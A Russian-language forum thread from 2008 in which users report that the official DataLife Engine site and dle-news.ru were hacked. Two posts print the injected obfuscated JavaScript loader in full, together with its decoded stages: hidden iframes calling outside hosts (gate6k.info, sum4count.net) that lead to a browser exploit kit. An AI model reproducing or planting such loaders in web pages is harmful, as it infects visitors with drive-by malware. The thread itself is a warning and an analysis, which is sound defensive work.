[!!!] Сайт целсофта поломали?! Подробности.

Тема в разделе "DLE", создана пользователем $aSH, 4 авг 2008.

Информация :
Актуальная версия DataLife Engine 12.0
( Final Release v.12.0 | Скачать DataLife Engine | Скачать 12.0 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.3 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. $aSH

    $aSH

    Регистр.:
    3 ноя 2006
    Сообщения:
    536
    Симпатии:
    233
    Сорри за такую кричащую тему, да еще в такой поздний час (02.40 местного)? но если это не подмена содержимого, не правка DNS в серваке.... то... )))


    Случайно решил зайти на офф.сайт и при загрузки сработал антизверь. Антизверь параноик, и увидив знакомое сочетание в домене google, я разрешил ему выполнить скрипт.
    Совственно сижу под оперой и ничего страшного не произошло.

    [update] пока писал, решил еще раз глянуть, скрипт отработал по новой (куки потер, ИП сменил для верности) и выкинул новый фрейм, скриншот с воплями авиры смотреть здесь http://imageshost.ru/links/c95a15ef6e488f9c4cd96b5f4035e5ca [/update]

    Озадачало только появление рекламы с гугля на сайте целсофта, который поидее еще до 6 в отпуске.

    Открываю исходник главной страницы? гуглом и не пахнет, а вижу ЛЕВЫЙ код, сначало не поверил.
    Код:
    <body><script language=JavaScript>	function mdnbn15(p) {	var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0,0,0,24,11,60,12,44,43,5,3,15,59,36,30,55,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0,0,0,0,41,0,48,16,20,21,28,22,2,42,54,18,23,17,25,62,9,37,34,61,56,47,40,35,57,39,32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KIzAXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7MusWnI')	</script><!-- dle-news.ru -->
    <script language="javascript" type="text/javascript">
    <!--
    var dle_root       = '/';
    
    после расшифровки получаем
    Код:
    window.status='Done';document.write('<iframe name=47210 src="http://gate6k.info/t/?'+Math.round(Math.random()*16909)+'47210'+'" width=457 height=37 style="display:none"></iframe>')
    
    т.е. открывается фрейм по адресу http://gate6k.info/t/?_РНД_47210
    причем открывается один раз - фильт по кукам + ip, если один раз у вас страница подгружалась - то выдается 404.

    смотрим
    Код:
    <iframe name=1c53b80a90 src='http://sum4count.net/strong/188/?cd6f51' width=399 height=60 style='display:none;'></iframe>
    
    грузим, смотрим
    Код:
    <html>
    <body>
    <script>
    document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%65%32%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%6D%70%39%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E"));
    </script>
    </body>
    </html>
    
    дешифруем
    Код:
    <iframe src="e2.html" width="1" height="1"></iframe>
    <iframe src="mp9.html" width="1" height="1"></iframe>
    
    короче мне надоело, это явно одна из последних сязок сплоитов под распространенные браузеры.

    как я понял выдают страницы RND со сплоитами, и если вы опять на них были - идет переадресация, в моем случае при первых попытках "пройтись до конца" была на msn.com

    под оперой 9.52 ничего не пристает. у кого ишак - даже не думайте, FF... хз.



    ИТОГО.
    КАК и через что внесли коррективы в сайт целсофта я НЕ знаю.

    либо хостер, либо шаблон через админку, либо пароль через троян на фтп... всяко может быть.


    зыы. проверил через разные php анамайзеры, код висит, значит точно не dns


    ==============
    //ТАК ЖЕ ЗАРАЖЕННЫМ оказался Украинский сайт DLE

    насчет украинского сайта поторопился. вот тут это было ложным срабатыванием, сейчас дешифровал, оказывается они так подгрузку css прячут.

    а вот dle-news.ru все еще светиться.

    значит имхо дело в хосте
     
    rider1203, iSQUARD, Nous и 6 другим нравится это.
  2. pozerovnet

    pozerovnet

    Регистр.:
    31 янв 2008
    Сообщения:
    400
    Симпатии:
    11
    Не значит ли это, что в ДЛЕ 7.2 (ведь она сейчас стоит у целсофта) есть брутальная дыра?

    В FF воскользовался подменой агента (залез типа под ослом 7) и увидел, как в статусной строке гризится порно и ещё что-то, потом мне предложило скачать pdf.pdf, от чего я естественно отказался.

    Ну нафиг, больше туда ни ногой, вдруг забуду подмену агента включить и получу на завтрак грязи :(
     
  3. Dark Angell

    Dark Angell Читатель

    Заблокирован
    Регистр.:
    29 фев 2008
    Сообщения:
    1.035
    Симпатии:
    690
    на оффоруме сам целсофт написал что будет работать с 10 августа,выход новой версии перенесен до 10 августа
     
  4. E-body

    E-body

    Регистр.:
    6 сен 2007
    Сообщения:
    985
    Симпатии:
    331
    После тега боди
    PHP:
    <body><script language=JavaScript>    function mdnbn15(p) {    var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0,0,0,24,11,60,12,44,43,5,3,15,59,36,30,55,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0,0,0,0,41,0,48,16,20,21,28,22,2,42,54,18,23,17,25,62,9,37,34,61,56,47,40,35,57,39,32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KIzAXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7MusWnI')    </script><!-- dle-news.ru -->
    На дле-невс.ру только что в соурс странице заметил...
    ифрейм сплойт жив :)
    За это целсофт должен всем пострадавшим выдать бесплатное продление лицензии как минимум на год.
     
  5. Dark Angell

    Dark Angell Читатель

    Заблокирован
    Регистр.:
    29 фев 2008
    Сообщения:
    1.035
    Симпатии:
    690
    вот что сам целсофт написал сегодня на сайте по поводу взлома сайта:
     
  6. Jerry

    Jerry тот самый Учиха

    Регистр.:
    16 апр 2006
    Сообщения:
    1.226
    Симпатии:
    490
    Очень содержательно. Вирус убрали со страницы.
     
Статус темы:
Закрыта.